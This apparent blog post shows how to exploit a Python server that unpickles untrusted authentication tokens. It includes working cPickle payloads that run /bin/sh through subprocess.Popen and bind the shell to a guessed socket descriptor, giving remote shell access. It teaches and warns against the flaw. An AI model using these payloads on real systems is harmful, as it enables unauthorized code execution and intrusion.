If you program in Python, you’re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you’re also familiar with the warning printed prominently near the start of pickle’s documentation:
Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Recently, however, I stumbled upon a project that was accepting and unpacking untrusted pickles over the network, and a poll of some friends revealed that few of them were aware of just how easy it is to exploit a service that does this. As such, this blog post will describe exactly how trivial it is to exploit such a service, using a simplified version of the code I recently encountered as an example. Nothing in here is novel, but it’s interesting if you haven’t seen it.
The Target
The vulnerable code was a Twisted server that listened over SSL. The code looked roughly like the following:
    import base64
    import cPickle

    from twisted.internet import protocol

    # check_hmac, getSecretKey and AuthenticationFailed are assumed to be
    # defined elsewhere in the project; they are not shown here.

    class VulnerableProtocol(protocol.Protocol):
        def dataReceived(self, data):
            # Code to actually parse incoming data according to an
            # internal state machine.
            # If we just finished receiving headers, call verifyAuth()
            # to check authentication.
            pass

        def verifyAuth(self, headers):
            try:
                token = cPickle.loads(base64.b64decode(headers['AuthToken']))
                if not check_hmac(token['signature'], token['data'], getSecretKey()):
                    raise AuthenticationFailed
                self.secure_data = token['data']
            except:
                raise AuthenticationFailed
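So, if we just send a request that looks something like:
    AuthToken: <pickle here>
the server will happily unpickle it. Note that the unpickling happens before the HMAC check, so we don’t need a valid signature to get this far.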
Executing Code
So, what can we do with that? Well, pickle is supposed to allow us to represent arbitrary objects. An obvious target is Python’s subprocess.Popen objects – if we can trick the target into instantiating one of those, they’ll be executing arbitrary commands for us! To generate such a pickle, however, we can’t just create a Popen object and pickle it; for various mostly-obvious reasons, that won’t work. We could read up on the pickle format and construct a stream by hand, but it turns out there is no need to.
pickle allows arbitrary objects to declare how they should be pickled by defining a __reduce__ method, which should return either a string or a tuple describing how to reconstruct this object on unpacking. In the simplest form, that tuple should just contain:
- A callable (which must be either a class, or satisfy some other, odder, constraints), and
- A tuple of arguments to call that callable on.
pickle will pickle each of these pieces separately, and then on unpickling, will call the callable on the provided arguments to construct the new object.
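To see the mechanism in isolation, here is a minimal, harmless sketch. It assumes Python 3 and the standard pickle module rather than the cPickle used elsewhere in this post; the class name Harmless is made up for illustration, and sorted stands in for a more dangerous callable.

```python
import pickle


class Harmless(object):
    """Hypothetical demo class; only its __reduce__ matters."""

    def __reduce__(self):
        # (callable, args): unpickling will evaluate sorted([3, 1, 2]).
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(Harmless())

# Loading the payload calls sorted([3, 1, 2]) and hands back its result;
# no Harmless instance is ever reconstructed.
result = pickle.loads(payload)
print(result)  # [1, 2, 3]
```

The receiving side never needs to know about the Harmless class: the stream only names the callable and its arguments, which is exactly what makes the trick work against a remote server.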
And so, we can construct a pickle that, when un-pickled, will execute /bin/sh, as follows:
    import cPickle
    import subprocess
    import base64

    class RunBinSh(object):
        def __reduce__(self):
            # On unpickling, the server calls subprocess.Popen(('/bin/sh',)).
            return (subprocess.Popen, (('/bin/sh',),))

    print base64.b64encode(cPickle.dumps(RunBinSh()))
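Building the payload runs nothing on our side, so it is safe to look inside it. The sketch below is an illustration, not part of the original exploit: it assumes Python 3, uses pickle in place of cPickle, and pins protocol 3 so that the callable shows up as a single GLOBAL opcode. The helper name summarize is hypothetical.

```python
import pickle
import pickletools
import subprocess


class RunBinSh(object):
    def __reduce__(self):
        return (subprocess.Popen, (('/bin/sh',),))


def summarize(payload):
    """Return (imported globals, opcode names) without loading the pickle."""
    globals_found = []
    opcode_names = []
    for opcode, arg, _pos in pickletools.genops(payload):
        opcode_names.append(opcode.name)
        if opcode.name == 'GLOBAL':
            # pickletools reports the argument as "module name".
            globals_found.append(arg)
    return globals_found, opcode_names


# dumps() only records *what to call*; nothing is executed here.
payload = pickle.dumps(RunBinSh(), protocol=3)
globals_found, opcode_names = summarize(payload)
print(globals_found)
print('REDUCE' in opcode_names)
```

The GLOBAL opcode names the callable to import and REDUCE is the instruction that calls it, so the whole attack is visible in the opcode stream before anything is loaded.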
Getting a Remote Shell
At this point, we’ve basically won. We can run arbitrary shell commands on the target, and there are any number of ways we could bootstrap from here up to an interactive shell and whatever else we might want.
For completeness, I’ll explain what I did, since it’s a moderately cute trick. subprocess.Popen lets us select which file descriptors to attach to stdin, stdout, and stderr for the new process by passing integers for the stdin and similarly-named arguments, so we can open our /bin/sh on arbitrarily-numbered fd’s.
However, as mentioned above, the target server uses Twisted, and it serves all requests in the same thread, using an asynchronous event-driven model. This means we can’t necessarily predict which file descriptor on the server will correspond to our socket, since it depends on how many other clients are connected.
It also means, however, that every time we connect to the server, we’ll open a new socket inside the same server process. So, let’s guess that the server has fewer than, say, 20 concurrent connections at the moment. If we connect to the server’s socket 20 times, that will open 20 new file descriptors in the server. Since they’ll get assigned sequentially, one of them will almost certainly be fd 20. Then, we can generate a pickle like so, and send it over:
    import cPickle
    import subprocess
    import base64

    class Exploit(object):
        def __reduce__(self):
            fd = 20
            return (subprocess.Popen,
                    (('/bin/sh',),  # args
                     0,             # bufsize
                     None,          # executable
                     fd, fd, fd     # std{in,out,err}
                     ))

    print base64.b64encode(cPickle.dumps(Exploit()))
We’ll open a /bin/sh on fd 20, which should be one of our 20 connections, and if all goes well, we’ll see a prompt printed to one of those. We’ll send some junk on that fd until we manage to get the original server to error out and close the connection, and we’ll be left talking to /bin/sh over a socket. Game over.
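The guess that new connections land on predictable descriptor numbers rests on how POSIX systems allocate descriptors: each new one gets the lowest number not already in use. Here is a small local check, assuming Python 3 on a POSIX system; it opens os.devnull rather than real sockets, and the helper name open_n is made up for this sketch.

```python
import os


def open_n(count):
    """Open `count` descriptors on os.devnull and return their numbers."""
    return [os.open(os.devnull, os.O_RDONLY) for _ in range(count)]


fds = open_n(5)
try:
    # Each descriptor takes the lowest free slot, so the numbers climb
    # as long as nothing else in the process closes one in between.
    print(fds)
finally:
    for fd in fds:
        os.close(fd)
```

In a quiet process this typically prints a run of consecutive integers, which is why opening 20 connections makes fd 20 a good bet.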
In Conclusion
Again, nothing here should be novel, nor would I expect any of these pieces to take a competent hacker more than a few minutes to figure out, given the problem. But if this blog post teaches someone not to use pickle on untrusted data, then it will be worth it.
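As a rough sketch of one alternative, a token can be authenticated before it is parsed at all, and then parsed with a format that cannot trigger code execution. This assumes Python 3 and a shared secret; SECRET_KEY, make_token, and verify_token are hypothetical names, not the actual API of the project described above.

```python
import base64
import hashlib
import hmac
import json

SECRET_KEY = b"example-key-for-illustration-only"  # hypothetical secret


def make_token(data):
    """Serialize `data` as JSON and prepend an HMAC-SHA256 tag."""
    body = json.dumps(data).encode("utf-8")
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    return base64.b64encode(tag + body)


def verify_token(token):
    """Check the tag first; only parse the body if it is authentic."""
    raw = base64.b64decode(token)
    tag, body = raw[:32], raw[32:]  # SHA-256 tags are 32 bytes
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad signature")
    return json.loads(body.decode("utf-8"))


token = make_token({"user": "alice"})
print(verify_token(token))
```

The ordering is the point: the signature covers the raw bytes, so nothing attacker-controlled reaches a parser until the tag has been checked, and even then the parser is JSON rather than pickle.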